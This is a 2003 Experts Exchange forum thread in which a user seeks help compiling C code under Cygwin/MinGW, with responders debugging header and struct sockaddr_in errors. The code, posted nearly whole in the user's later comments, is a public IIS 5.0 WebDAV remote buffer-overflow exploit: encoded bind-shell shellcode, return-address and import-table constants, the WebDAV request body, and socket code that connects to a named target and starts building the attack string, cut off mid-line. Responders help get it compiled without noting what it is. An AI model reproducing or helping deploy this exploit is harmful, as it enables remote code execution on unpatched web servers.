?
Solved

"storage size of 'dst' isn't known" ??? any ideas?

Posted on 2003-03-31
28
Medium Priority
?
1,677 Views
Last Modified: 2013-11-15
I am trying to compile this program, and I keep getting this error:

$ gcc test.c
test.c:128:3: warning: multi-line string literals are deprecated
test.c: In function `main':
test.c:140: storage size of `dst' isn't known
test.c:145:18: warning: multi-line string literals are deprecated
test.c:172:27: warning: multi-line string literals are deprecated
test.c:183:27: warning: multi-line string literals are deprecated
test.c:244:34: warning: multi-line string literals are deprecated
test.c:262:10: warning: multi-line string literals are deprecated
test.c:275:16: warning: multi-line string literals are deprecated
test.c:278:12: warning: multi-line string literals are deprecated

Same if i use 'gcc test.c -o test.exe'

Any ideas?
0
Comment
Question by:MtM
[X]
Welcome to Experts Exchange

Add your voice to the tech community where 5M+ people just like you are talking about what matters.

  • Help others & share knowledge
  • Earn cash & points
  • Learn & ask questions
  • 16
  • 4
  • 4
  • +2
28 Comments
 
LVL 22

Expert Comment

by:grg99
ID: 8241782
Well, you seem to have something named "dst" that isnt declared before line 140.  

You also have some multi-line literals, which often is a sign of some end-of-line problems.   Did you FTP this file from a DOS system or somesuch?


How about posting your code so we can see what's up?


0
 

Author Comment

by:MtM
ID: 8241830
Whats your e-mail?  I can forward it to you.
0
 

Author Comment

by:MtM
ID: 8241835
Whats your e-mail?  I can forward it to you.
0
Complete VMware vSphere® ESX(i) & Hyper-V Backup

Capture your entire system, including the host, with patented disk imaging integrated with VMware VADP / Microsoft VSS and RCT. RTOs is as low as 15 seconds with Acronis Active Restore™. You can enjoy unlimited P2V/V2V migrations from any source (even from a different hypervisor)

 

Author Comment

by:MtM
ID: 8241844
I think the problem starts here:

int main (int argc, char **argv)
{
 
  unsigned long ret;
  unsigned short port;
  int tport, bport, s, i, j, r, rt=0;
  struct hostent *h;
  struct sockaddr_in dst;
  char buffer[MAXBUF];

......
0
 

Author Comment

by:MtM
ID: 8241866
#include <stdio.h>
#include <errno.h>
#include <string.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netdb.h>
#include <netinet/in.h>

// Change to fit your need
#define  RET             0x4804          // EIP = 0x00480004
#define  LOADLIBRARYA    0x0100107c
#define  GETPROCADDRESS  0x01001034


// Don't change this
#define  PORT_OFFSET     1052
#define  LOADL_OFFSET    798
#define  GETPROC_OFFSET  815
#define  NOP             0x90
#define  MAXBUF          100000


/*
 * LoadLibraryA IT Address   := 0100107C
 * GetProcAddress IT Address := 01001034
 */

...... Skip down a little bit....

unsigned char jumpcode[] = "\x8b\xf9\x32\xc0\xfe\xc0\xf2\xae\xff\xe7";
/* mov edi, ecx
 * xor al, al
 * inc al
 * repnz scasb
 * jmp edi
 */

char body[] = "<?xml version=\"1.0\"?>\r\n<g:searchrequest xmlns:g=\"DAV:\">\r\
n" \
  "<g:sql>\r\nSelect \"DAV:displayname\" from scope()\r\n</g:sql>\r\n</g:search
request>\r\n";


/* Our code starts here */
int main (int argc, char **argv)
{
 
  unsigned long ret;
  unsigned short port;
  int tport, bport, s, i, j, r, rt=0;
  struct hostent *h;
  struct sockaddr_in dst;
  char buffer[MAXBUF];

I got it off the web
0
 

Author Comment

by:MtM
ID: 8241871
*Note, thats not all of it... but i was hoping the problem is in there....
0
 
LVL 6

Accepted Solution

by:
GaryFx earned 225 total points
ID: 8241884
Do you have any relevant include lines?  On my system you need to #include <netinet/in.h> in order to get the definition of struct sockaddr_in.

Gary
0
 

Author Comment

by:MtM
ID: 8241930
What do you mean?  I did include netinet/in.h. That is not the whole program there.. and i cut soem stuff out to save space... did i not declare dst right somewhere?
0
 
LVL 6

Expert Comment

by:GaryFx
ID: 8241940
I posted my previous note before seeing your more extended posting.

Try getting rid of the backslash at the end of the first line of the definition of body (outside the double quote).

Gary
0
 

Author Comment

by:MtM
ID: 8241950
I get the same thing... :-/
0
 

Author Comment

by:MtM
ID: 8241963
bcopy(h->h_addr, &dst.sin_addr, h->h_length);
  dst.sin_family = AF_INET;
  dst.sin_port = htons(tport);
 
  // Socket creation
  if ((s = socket(AF_INET, SOCK_STREAM, 0)) == -1)
        {
          perror("Failed to create socket");
          exit(-5);
        }
 
  // Connection
  if (connect(s, (struct sockaddr *)&dst, sizeof(dst)) == -1)

That is at the very bottom... and the only other part of the code that has 'dst' in it
0
 
LVL 2

Expert Comment

by:honey_hamster
ID: 8242035
For the 'depricated' error, try making body[] into a single string, instead of 2 strings separated by the backslash, i.e. remove the " before the \, and remove the \, and remove the " that used to be right after the \.

And for dst, you might want to look at netinet\in.h and see the definition of struct sockaddr_in - maybe you need to set something up in order for the size of one of its fields to be known.  Feel free to post your compiler's definition of struct sockaddr_in - maybe somebody here can spot the problem.
0
 
LVL 6

Expert Comment

by:GaryFx
ID: 8242589
What version of gcc are you using?  

Gary
0
 
LVL 1

Expert Comment

by:sarda_ramesh
ID: 8244464
hi there,

it seems that this is not a very big problem. u r expanding strings over two lines , dont do that, put it on a single line. e.g if the string constant is like

"hello \
 world"

write it as "hello world"

in vi editor if the string is longer than the horizonat number of characters it will continue on the next line but if u see the line number (use :set nu) u will see that the two lines are actually one. try using this.

regards
ramesh

0
 

Author Comment

by:MtM
ID: 8245969
I am using cygwin to emulate unix, and then moved over
minGW for gcc... (DOWNLOADED it yesterday, so newset i guess) and I'm actually not sure of the version.  I have two if.h's, the first includes the other... Here are both of them:


/* netinet/in.h

   Copyright 1998, 2001 Red Hat, Inc.

This file is part of Cygwin.

This software is a copyrighted work licensed under the terms of the
Cygwin license.  Please consult the file "CYGWIN_LICENSE" for
details. */

#ifndef _NETINET_IN_H
#define _NETINET_IN_H

#include <cygwin/in.h>

#endif /* _NETINET_IN_H */


THERES THE NEXT ONE:


/* cygwin/if.h

   Copyright 1996, 2001 Red Hat, Inc.

This file is part of Cygwin.

This software is a copyrighted work licensed under the terms of the
Cygwin license.  Please consult the file "CYGWIN_LICENSE" for
details. */

#ifndef _CYGWIN_IF_H_
#define _CYGWIN_IF_H_

#ifdef __cplusplus
extern "C" {
#endif /* __cplusplus */

#include <sys/types.h>
#include <sys/socket.h>

/* Standard interface flags. */
#define IFF_UP          0x1             /* interface is up              */
#define IFF_BROADCAST   0x2             /* broadcast address valid      */
#define IFF_LOOPBACK    0x8             /* is a loopback net            */
#define IFF_NOTRAILERS  0x20            /* avoid use of trailers        */
#define IFF_RUNNING     0x40            /* resources allocated          */
#define IFF_PROMISC     0x100           /* receive all packets          */
#define IFF_MULTICAST   0x1000          /* Supports multicast           */

/*
 * Interface request structure used for socket
 * ioctl's.  All interface ioctl's must have parameter
 * definitions which begin with ifr_name.  The
 * remainder may be interface specific.
 */

struct ifreq
{
#define IFNAMSIZ        16
#define IFHWADDRLEN     6
     union
     {
          char    ifrn_name[IFNAMSIZ];            /* if name, e.g. "en0" */
     } ifr_ifrn;

     union {
          struct  sockaddr ifru_addr;
          struct  sockaddr ifru_broadaddr;
          struct  sockaddr ifru_netmask;
          struct  sockaddr ifru_hwaddr;
          short   ifru_flags;
          int     ifru_metric;
          int     ifru_mtu;
     } ifr_ifru;
};

#define ifr_name        ifr_ifrn.ifrn_name      /* interface name       */
#define ifr_addr        ifr_ifru.ifru_addr      /* address              */
#define ifr_broadaddr   ifr_ifru.ifru_broadaddr /* broadcast address    */
#define ifr_netmask     ifr_ifru.ifru_netmask   /* interface net mask   */
#define ifr_flags       ifr_ifru.ifru_flags     /* flags                */
#define ifr_hwaddr      ifr_ifru.ifru_hwaddr    /* MAC address          */
#define ifr_metric      ifr_ifru.ifru_metric    /* metric               */
#define ifr_mtu         ifr_ifru.ifru_mtu       /* mtu                  */


/*
 * Structure used in SIOCGIFCONF request.
 * Used to retrieve interface configuration
 * for machine (useful for programs which
 * must know all networks accessible).
 */

struct ifconf
{
     int     ifc_len;                        /* size of buffer       */
     union
     {
          caddr_t ifcu_buf;
          struct  ifreq *ifcu_req;
     } ifc_ifcu;
};
#define ifc_buf ifc_ifcu.ifcu_buf               /* buffer address       */
#define ifc_req ifc_ifcu.ifcu_req               /* array of structures  */

#ifdef __cplusplus
};
#endif /* __cplusplus */

#endif /* _CYGWIN_IF_H_ */
0
 

Author Comment

by:MtM
ID: 8246066
test1.c: In function `main':
test1.c:138: storage size of `dst' isn't known

That is the only error I'm getting now... took care of all those warnings.  I'm so close :-/
0
 
LVL 2

Expert Comment

by:honey_hamster
ID: 8246139
You posted cygwin/if.h, not cygwin/in.h - can you post your in.h?
0
 

Author Comment

by:MtM
ID: 8246192
My problem before was that I had to of the same in.h in both those folders... So one of them was just includeding the same file again.  Now that I have it including the right in.h with the actual information about all the tcpip stuff it needs... i get this error:

In File included from c:/cygwin/lib/gcc-lib/mingw32/3.2/include/netinet/in.h:14,from test1.c:8:

c:/cygwin/lib/gcc-lib/mingw32/3.2/include/cygwin/in.h:40: parse error before "in_port_t:

c:/cygwin.lib/gcc-lib/wingw32/include/cygwin/in.h:81: parse error before :in_addr_t:

Thanks for your help again
0
 

Author Comment

by:MtM
ID: 8246198

typedef uint16_t in_port_t;
/* Standard well-known ports.  *//* from winsup/include/netinet/in.h */
enum
{


Looks like thats the line its having problems with
0
 

Author Comment

by:MtM
ID: 8246224
Opps.. sorry, heres the in.h

/*
 * INET            An implementation of the TCP/IP protocol suite for the LINUX
 *            operating system.  INET is implemented using the  BSD Socket
 *            interface as the means of communication with the user level.
 *
 *            Definitions of the Internet Protocol.
 *
 * Version:      @(#)in.h      1.0.1      04/21/93
 *
 * Authors:      Original taken from the GNU Project <netinet/in.h> file.
 *            Fred N. van Kempen, <waltje@uWalt.NL.Mugnet.ORG>
 *
 *            This program is free software; you can redistribute it and/or
 *            modify it under the terms of the GNU General Public License
 *            as published by the Free Software Foundation; either version
 *            2 of the License, or (at your option) any later version.
 */
#ifndef _CYGWIN_IN_H
#define _CYGWIN_IN_H

#include <cygwin/types.h>

/* Standard well-defined IP protocols.  */
enum
{
  IPPROTO_IP = 0,            /* Dummy protocol for TCP            */
  IPPROTO_ICMP = 1,            /* Internet Control Message Protocol      */
  IPPROTO_IGMP = 2,            /* Internet Gateway Management Protocol */
  IPPROTO_IPIP = 4,            /* IPIP tunnels (older KA9Q tunnels use 94) */
  IPPROTO_TCP = 6,            /* Transmission Control Protocol      */
  IPPROTO_EGP = 8,            /* Exterior Gateway Protocol            */
  IPPROTO_PUP = 12,            /* PUP protocol                        */
  IPPROTO_UDP = 17,            /* User Datagram Protocol            */
  IPPROTO_IDP = 22,            /* XNS IDP protocol                  */

  IPPROTO_RAW = 255,            /* Raw IP packets                  */
  IPPROTO_MAX
};

typedef uint16_t in_port_t;
/* Standard well-known ports.  *//* from winsup/include/netinet/in.h */
enum
{
  IPPORT_ECHO = 7,            /* Echo service.  */
  IPPORT_DISCARD = 9,            /* Discard transmissions service.  */
  IPPORT_SYSTAT = 11,            /* System status service.  */
  IPPORT_DAYTIME = 13,      /* Time of day service.  */
  IPPORT_NETSTAT = 15,      /* Network status service.  */
  IPPORT_FTP = 21,            /* File Transfer Protocol.  */
  IPPORT_TELNET = 23,            /* Telnet protocol.  */
  IPPORT_SMTP = 25,            /* Simple Mail Transfer Protocol.  */
  IPPORT_TIMESERVER = 37,      /* Timeserver service.  */
  IPPORT_NAMESERVER = 42,      /* Domain Name Service.  */
  IPPORT_WHOIS = 43,            /* Internet Whois service.  */
  IPPORT_MTP = 57,

  IPPORT_TFTP = 69,            /* Trivial File Transfer Protocol.  */
  IPPORT_RJE = 77,
  IPPORT_FINGER = 79,            /* Finger service.  */
  IPPORT_TTYLINK = 87,
  IPPORT_SUPDUP = 95,            /* SUPDUP protocol.  */


  IPPORT_EXECSERVER = 512,      /* execd service.  */
  IPPORT_LOGINSERVER = 513,      /* rlogind service.  */
  IPPORT_CMDSERVER = 514,
  IPPORT_EFSSERVER = 520,

  /* UDP ports.  */
  IPPORT_BIFFUDP = 512,
  IPPORT_WHOSERVER = 513,
  IPPORT_ROUTESERVER = 520,

  /* Ports less than this value are reserved for privileged processes.  */
  IPPORT_RESERVED = 1024,

  /* Ports greater this value are reserved for (non-privileged) servers.  */
  IPPORT_USERRESERVED = 5000
};

typedef uint32_t in_addr_t;
/* Internet address. */
struct in_addr
{
  unsigned int s_addr;
};

/* Request struct for multicast socket ops */

struct ip_mreq
{
  struct in_addr imr_multiaddr;      /* IP multicast address of group */
  struct in_addr imr_interface;      /* local IP address of interface */
};


/* Structure describing an Internet (IP) socket address. */
#define __SOCK_SIZE__      16            /* sizeof(struct sockaddr)      */
struct sockaddr_in
{
  short int sin_family;      /* Address family            */
  unsigned short int sin_port;      /* Port number                  */
  struct in_addr sin_addr;      /* Internet address            */

  /* Pad to size of `struct sockaddr'. */
  unsigned char  __pad[__SOCK_SIZE__ - sizeof(short int)
                  - sizeof(unsigned short int) - sizeof(struct in_addr)];
};
#define sin_zero      __pad            /* for BSD UNIX comp. -FvK      */

/*
 * Definitions of the bits in an Internet address integer.
 * On subnets, host and network parts are found according
 * to the subnet mask, not these masks.
 */
#define      IN_CLASSA(a)            ((((long int) (a)) & 0x80000000) == 0)
#define      IN_CLASSA_NET            0xff000000
#define      IN_CLASSA_NSHIFT      24
#define      IN_CLASSA_HOST            (0xffffffff & ~IN_CLASSA_NET)
#define      IN_CLASSA_MAX            128

#define      IN_CLASSB(a)            ((((long int) (a)) & 0xc0000000) == 0x80000000)
#define      IN_CLASSB_NET            0xffff0000
#define      IN_CLASSB_NSHIFT      16
#define      IN_CLASSB_HOST            (0xffffffff & ~IN_CLASSB_NET)
#define      IN_CLASSB_MAX            65536

#define      IN_CLASSC(a)            ((((long int) (a)) & 0xe0000000) == 0xc0000000)
#define      IN_CLASSC_NET            0xffffff00
#define      IN_CLASSC_NSHIFT      8
#define      IN_CLASSC_HOST            (0xffffffff & ~IN_CLASSC_NET)

#define      IN_CLASSD(a)            ((((long int) (a)) & 0xf0000000) == 0xe0000000)
#define      IN_MULTICAST(a)            IN_CLASSD(a)
#define IN_MULTICAST_NET      0xF0000000

#define      IN_EXPERIMENTAL(a)      ((((long int) (a)) & 0xe0000000) == 0xe0000000)
#define      IN_BADCLASS(a)            ((((long int) (a)) & 0xf0000000) == 0xf0000000)

/* Address to accept any incoming messages. */
#define      INADDR_ANY            ((unsigned long int) 0x00000000)

/* Address to send to all hosts. */
#define      INADDR_BROADCAST      ((unsigned long int) 0xffffffff)

/* Address indicating an error return. */
#define      INADDR_NONE            0xffffffff

/* Network number for local host loopback. */
#define      IN_LOOPBACKNET            127

/* Address to loopback in software to local host.  */
#define      INADDR_LOOPBACK            0x7f000001      /* 127.0.0.1   */
#define      IN_LOOPBACK(a)            ((((long int) (a)) & 0xff000000) == 0x7f000000)

/* Defines for Multicast INADDR */
#define INADDR_UNSPEC_GROUP      0xe0000000      /* 224.0.0.0   */
#define INADDR_ALLHOSTS_GROUP      0xe0000001      /* 224.0.0.1   */
#define INADDR_MAX_LOCAL_GROUP  0xe00000ff      /* 224.0.0.255 */

/* <asm/byteorder.h> contains the htonl type stuff.. */

#include <asm/byteorder.h>

/* Some random defines to make it easier in the kernel.. */
#ifdef __KERNEL__

#define LOOPBACK(x)      (((x) & htonl(0xff000000)) == htonl(0x7f000000))
#define MULTICAST(x)      (((x) & htonl(0xf0000000)) == htonl(0xe0000000))

#endif

/* IPv6 definitions as we start to include them. This is just
   a beginning dont get excited 8) */
struct in6_addr
{
  unsigned char s6_addr[16];
};

struct sockaddr_in6
{
  unsigned short sin6_family;
  unsigned short sin6_port;
  unsigned long sin6_flowinfo;
  struct in6_addr sin6_addr;
};
#endif      /* _CYGWIN_IN_H */
0
 

Author Comment

by:MtM
ID: 8246276
I also just realized that I moved on sys/types.h into both my cygwin dir because i was getting "onclifting types for 'ino_t'  when i put them back to default, with the in.h also at default, the error reads like this:

In file included from c:/cygwin/lib/gcc-lib/wingw32/3.2/include/cygwin/in.h:21,
from c:/cygwin/lib/gcc-lb/wingw32/3.2/include/netinet/in.h:14, from test1.c:8:
c:/cygwin/lib/gcc-lib/wingw32/3.2/include/cygwin/types.h:98: conflicting types for 'ino_t'
c:/cygwin/lib/gcc-lib/wingw32/3.2/include/sys/types.h:121: previous declaration of 'ino_t'
0
 
LVL 2

Expert Comment

by:honey_hamster
ID: 8246305
I think the problem is that the compiler doesn't know what uint32_t and uint16_t are.  At the top of in.h, there is an include of cygwin/types.h.  You might want to check to see whether uintxx_t are typedef'ed in there.  If they are, there might be an #ifndef that's preventing them from being seen by the compiler.  If you can't figure out why uintxx_t aren't being defined, then as an ugly hack, you can add the following 2 lines to your source file before including in.h:
typedef uint32_t unsigned long;
typedef uint16_t unsigned short;
0
 
LVL 2

Expert Comment

by:honey_hamster
ID: 8246368
Sorry, I posted before your final post.  It's not ideal to have 2 different 'types.h' being included by the same .c file.  It's even more dangerous if different .c files include DIFFERENT 'types.h'.  One thing you could try is ensure that the 2 different types.h are identical.  Temporarily rename sys\types.h sys\types.h.old and then copy cygwin\types.h sys\types.h.
0
 

Author Comment

by:MtM
ID: 8246608
I'm sure its my inexperience, and the fact that I'm using cygwin with minGW, but I can't figure this out.  There is the whole program i'm trying to compile, maybe someone with a real linux/unix compiler can actually compile it.  Then maybe I will know whats up.

#include <stdio.h>
#include <errno.h>
#include <string.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netdb.h>
#include <netinet/in.h>

 
// Change to fit your need
#define  RET             0x4804          // EIP = 0x00480004
#define  LOADLIBRARYA    0x0100107c
#define  GETPROCADDRESS  0x01001034


// Don't change this
#define  PORT_OFFSET     1052
#define  LOADL_OFFSET    798
#define  GETPROC_OFFSET  815
#define  NOP             0x90
#define  MAXBUF          100000


/*
 * LoadLibraryA IT Address   := 0100107C
 * GetProcAddress IT Address := 01001034
 */

unsigned char shellcode[] =            // Deepzone shellcode
  "\x68\x5e\x56\xc3\x90\x54\x59\xff\xd1\x58\x33\xc9\xb1\x1c"
  "\x90\x90\x90\x90\x03\xf1\x56\x5f\x33\xc9\x66\xb9\x95\x04"
  "\x90\x90\x90\xac\x34\x99\xaa\xe2\xfa\x71\x99\x99\x99\x99"
  "\xc4\x18\x74\x40\xb8\xd9\x99\x14\x2c\x6b\xbd\xd9\x99\x14"
  "\x24\x63\xbd\xd9\x99\xf3\x9e\x09\x09\x09\x09\xc0\x71\x4b"
  "\x9b\x99\x99\x14\x2c\xb3\xbc\xd9\x99\x14\x24\xaa\xbc\xd9"
  "\x99\xf3\x93\x09\x09\x09\x09\xc0\x71\x23\x9b\x99\x99\xf3"
  "\x99\x14\x2c\x40\xbc\xd9\x99\xcf\x14\x2c\x7c\xbc\xd9\x99"
  "\xcf\x14\x2c\x70\xbc\xd9\x99\xcf\x66\x0c\xaa\xbc\xd9\x99"
  "\xf3\x99\x14\x2c\x40\xbc\xd9\x99\xcf\x14\x2c\x74\xbc\xd9"
  "\x99\xcf\x14\x2c\x68\xbc\xd9\x99\xcf\x66\x0c\xaa\xbc\xd9"
  "\x99\x5e\x1c\x6c\xbc\xd9\x99\xdd\x99\x99\x99\x14\x2c\x6c"
  "\xbc\xd9\x99\xcf\x66\x0c\xae\xbc\xd9\x99\x14\x2c\xb4\xbf"
  "\xd9\x99\x34\xc9\x66\x0c\xca\xbc\xd9\x99\x14\x2c\xa8\xbf"
  "\xd9\x99\x34\xc9\x66\x0c\xca\xbc\xd9\x99\x14\x2c\x68\xbc"
  "\xd9\x99\x14\x24\xb4\xbf\xd9\x99\x3c\x14\x2c\x7c\xbc\xd9"
  "\x99\x34\x14\x24\xa8\xbf\xd9\x99\x32\x14\x24\xac\xbf\xd9"
  "\x99\x32\x5e\x1c\xbc\xbf\xd9\x99\x99\x99\x99\x99\x5e\x1c"
  "\xb8\xbf\xd9\x99\x98\x98\x99\x99\x14\x2c\xa0\xbf\xd9\x99"
  "\xcf\x14\x2c\x6c\xbc\xd9\x99\xcf\xf3\x99\xf3\x99\xf3\x89"
  "\xf3\x98\xf3\x99\xf3\x99\x14\x2c\xd0\xbf\xd9\x99\xcf\xf3"
  "\x99\x66\x0c\xa2\xbc\xd9\x99\xf1\x99\xb9\x99\x99\x09\xf1"
  "\x99\x9b\x99\x99\x66\x0c\xda\xbc\xd9\x99\x10\x1c\xc8\xbf"
  "\xd9\x99\xaa\x59\xc9\xd9\xc9\xd9\xc9\x66\x0c\x63\xbd\xd9"
  "\x99\xc9\xc2\xf3\x89\x14\x2c\x50\xbc\xd9\x99\xcf\xca\x66"
  "\x0c\x67\xbd\xd9\x99\xf3\x9a\xca\x66\x0c\x9b\xbc\xd9\x99"
  "\x14\x2c\xcc\xbf\xd9\x99\xcf\x14\x2c\x50\xbc\xd9\x99\xcf"
  "\xca\x66\x0c\x9f\xbc\xd9\x99\x14\x24\xc0\xbf\xd9\x99\x32"
  "\xaa\x59\xc9\x14\x24\xfc\xbf\xd9\x99\xce\xc9\xc9\xc9\x14"
  "\x2c\x70\xbc\xd9\x99\x34\xc9\x66\x0c\xa6\xbc\xd9\x99\xf3"
  "\xa9\x66\x0c\xd6\xbc\xd9\x99\x72\xd4\x09\x09\x09\xaa\x59"
  "\xc9\x14\x24\xfc\xbf\xd9\x99\xce\xc9\xc9\xc9\x14\x2c\x70"
  "\xbc\xd9\x99\x34\xc9\x66\x0c\xa6\xbc\xd9\x99\xf3\xc9\x66"
  "\x0c\xd6\xbc\xd9\x99\x1a\x24\xfc\xbf\xd9\x99\x9b\x96\x1b"
  "\x8e\x98\x99\x99\x18\x24\xfc\xbf\xd9\x99\x98\xb9\x99\x99"
  "\xeb\x97\x09\x09\x09\x09\x5e\x1c\xfc\xbf\xd9\x99\x99\xb9"
  "\x99\x99\xf3\x99\x12\x1c\xfc\xbf\xd9\x99\x14\x24\xfc\xbf"
  "\xd9\x99\xce\xc9\x12\x1c\xc8\xbf\xd9\x99\xc9\x14\x2c\x70"
  "\xbc\xd9\x99\x34\xc9\x66\x0c\xde\xbc\xd9\x99\xf3\xc9\x66"
  "\x0c\xd6\xbc\xd9\x99\x12\x1c\xfc\xbf\xd9\x99\xf3\x99\xc9"
  "\x14\x2c\xc8\xbf\xd9\x99\x34\xc9\x14\x2c\xc0\xbf\xd9\x99"
  "\x34\xc9\x66\x0c\x93\xbc\xd9\x99\xf3\x99\x14\x24\xfc\xbf"
  "\xd9\x99\xce\xf3\x99\xf3\x99\xf3\x99\x14\x2c\x70\xbc\xd9"
  "\x99\x34\xc9\x66\x0c\xa6\xbc\xd9\x99\xf3\xc9\x66\x0c\xd6"
  "\xbc\xd9\x99\xaa\x50\xa0\x14\xfc\xbf\xd9\x99\x96\x1e\xfe"
  "\x66\x66\x66\xf3\x99\xf1\x99\xb9\x99\x99\x09\x14\x2c\xc8"
  "\xbf\xd9\x99\x34\xc9\x14\x2c\xc0\xbf\xd9\x99\x34\xc9\x66"
  "\x0c\x97\xbc\xd9\x99\x10\x1c\xf8\xbf\xd9\x99\xf3\x99\x14"
  "\x24\xfc\xbf\xd9\x99\xce\xc9\x14\x2c\xc8\xbf\xd9\x99\x34"
  "\xc9\x14\x2c\x74\xbc\xd9\x99\x34\xc9\x66\x0c\xd2\xbc\xd9"
  "\x99\xf3\xc9\x66\x0c\xd6\xbc\xd9\x99\xf3\x99\x12\x1c\xf8"
  "\xbf\xd9\x99\x14\x24\xfc\xbf\xd9\x99\xce\xc9\x12\x1c\xc8"
  "\xbf\xd9\x99\xc9\x14\x2c\x70\xbc\xd9\x99\x34\xc9\x66\x0c"
  "\xde\xbc\xd9\x99\xf3\xc9\x66\x0c\xd6\xbc\xd9\x99\x70\x20"
  "\x67\x66\x66\x14\x2c\xc0\xbf\xd9\x99\x34\xc9\x66\x0c\x8b"
  "\xbc\xd9\x99\x14\x2c\xc4\xbf\xd9\x99\x34\xc9\x66\x0c\x8b"
  "\xbc\xd9\x99\xf3\x99\x66\x0c\xce\xbc\xd9\x99\xc8\xcf\xf1"
  "\xe5\x89\x99\x98\x09\xc3\x66\x8b\xc9\xc2\xc0\xce\xc7\xc8"
  "\xcf\xca\xf1\xad\x89\x99\x98\x09\xc3\x66\x8b\xc9\x35\x1d"
  "\x59\xec\x62\xc1\x32\xc0\x7b\x70\x5a\xce\xca\xd6\xda\xd2"
  "\xaa\xab\x99\xea\xf6\xfa\xf2\xfc\xed\x99\xfb\xf0\xf7\xfd"
  "\x99\xf5\xf0\xea\xed\xfc\xf7\x99\xf8\xfa\xfa\xfc\xe9\xed"
  "\x99\xea\xfc\xf7\xfd\x99\xeb\xfc\xfa\xef\x99\xfa\xf5\xf6"
  "\xea\xfc\xea\xf6\xfa\xf2\xfc\xed\x99\xd2\xdc\xcb\xd7\xdc"
  "\xd5\xaa\xab\x99\xda\xeb\xfc\xf8\xed\xfc\xc9\xf0\xe9\xfc"
  "\x99\xde\xfc\xed\xca\xed\xf8\xeb\xed\xec\xe9\xd0\xf7\xff"
  "\xf6\xd8\x99\xda\xeb\xfc\xf8\xed\xfc\xc9\xeb\xf6\xfa\xfc"
  "\xea\xea\xd8\x99\xc9\xfc\xfc\xf2\xd7\xf8\xf4\xfc\xfd\xc9"
  "\xf0\xe9\xfc\x99\xde\xf5\xf6\xfb\xf8\xf5\xd8\xf5\xf5\xf6"
  "\xfa\x99\xcb\xfc\xf8\xfd\xdf\xf0\xf5\xfc\x99\xce\xeb\xf0"
  "\xed\xfc\xdf\xf0\xf5\xfc\x99\xca\xf5\xfc\xfc\xe9\x99\xda"
  "\xf5\xf6\xea\xfc\xd1\xf8\xf7\xfd\xf5\xfc\x99\xdc\xe1\xf0"
  "\xed\xc9\xeb\xf6\xfa\xfc\xea\xea\x99\xda\xf6\xfd\xfc\xfd"
  "\xb9\xfb\xe0\xb9\xe5\xc3\xf8\xf7\xb9\xa5\xf0\xe3\xf8\xf7"
  "\xd9\xfd\xfc\xfc\xe9\xe3\xf6\xf7\xfc\xb7\xf6\xeb\xfe\xa7"
  "\x9b\x99\x86\xd1\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99"
  "\x99\x99\x95\x99\x99\x99\x99\x99\x99\x99\x98\x99\x99\x99"
  "\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99"
  "\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99"
  "\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99"
  "\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99"
  "\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99"
  "\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99"
  "\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99"
  "\x99\x99\xda\xd4\xdd\xb7\xdc\xc1\xdc\x99\x99\x99\x99\x99"
  "\x89\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99"
  "\x99\x99\x99\x99\x99\x99\x90\x90\x90\x90\x90\x90\x90\x90";

unsigned char jumpcode[] = "\x8b\xf9\x32\xc0\xfe\xc0\xf2\xae\xff\xe7";
/* mov edi, ecx
 * xor al, al
 * inc al
 * repnz scasb
 * jmp edi
 */

char body[] = "<?xml version=\"1.0\"?>\r\n<g:searchrequest xmlns:g=\"DAV:\">\r\n"
  "<g:sql>\r\nSelect \"DAV:displayname\" from scope()\r\n</g:sql>\r\n</g:searchrequest>\r\n";


/* Our code starts here */
int main (int argc, char **argv)
{
 
  unsigned long ret;
  unsigned short port;
  int tport, bport, s, i, j, r, rt=0;
  struct hostent *h;
  struct sockaddr_in dst;
  char buffer[MAXBUF];

  if (argc < 2 || argc > 5)
        {
          printf("IIS 5.0 WebDAV Exploit by RoMaNSoFt <roman@rs-labs.com>. 23/03/2003\nUsage: %s <target host> [target port] [bind port] [ret]\nE.g 1: %s victim.com\nE.g 2: %s victim.com 80 31337 %#.4x\n", argv[0], argv[0], argv[0], RET);
          exit(-1);
        }
 
  // Default target port = 80
  if (argc > 2)
        tport = atoi(argv[2]);
  else
        tport = 80;

  // Default bind port = 31337
  if (argc > 3)
        bport = atoi(argv[3]);
  else
        bport = 31337;

  // Default ret value = RET
  if (argc > 4)
        ret = strtoul(argv[4], NULL, 16);
  else
        ret = RET;

  if ( ret > 0xffff || (ret & 0xff) == 0 || (ret & 0xff00) == 0 )
        {
          fprintf(stderr, "RET value must be in 0x0000-0xffff range and it may not contain null-bytes\nAborted!\n");
          exit(-2);
        }
   
  // Shellcode patching
  port = htons(bport);
  port ^= 0x9999;
 
  if ( ((port & 0xff) == 0) || ((port & 0xff00) == 0) )
        {
          fprintf(stderr, "Binding-port contains null-byte. Use another port.\n Aborted!\n");
          exit(-3);
        }
 
  *(unsigned short *)&shellcode[PORT_OFFSET] = port;
  *(unsigned long *)&shellcode[LOADL_OFFSET] = LOADLIBRARYA ^ 0x99999999;
  *(unsigned long *)&shellcode[GETPROC_OFFSET] = GETPROCADDRESS ^ 0x99999999;
  // If the last two items contain any null-bytes, exploit will fail.
  // WARNING: this check is not performed here. Be careful and check it for you

 
  // Resolve hostname
  printf("[*] Resolving hostname ...\n");
  if ((h = gethostbyname(argv[1])) == NULL)
        {
          fprintf(stderr, "%s: unknown hostname\n", argv[1]);
          exit(-4);
        }
 
  bcopy(h->h_addr, &dst.sin_addr, h->h_length);
  dst.sin_family = AF_INET;
  dst.sin_port = htons(tport);
 
  // Socket creation
  if ((s = socket(AF_INET, SOCK_STREAM, 0)) == -1)
        {
          perror("Failed to create socket");
          exit(-5);
        }
 
  // Connection
  if (connect(s, (struct sockaddr *)&dst, sizeof(dst)) == -1)
        {
          perror("Failed to connect");
          exit(-6);
        }
 
  // Build malicious string...
  printf("[*] Attacking port %i at %s (EIP = %#.4x%.4x)...\n", tport, argv[1],
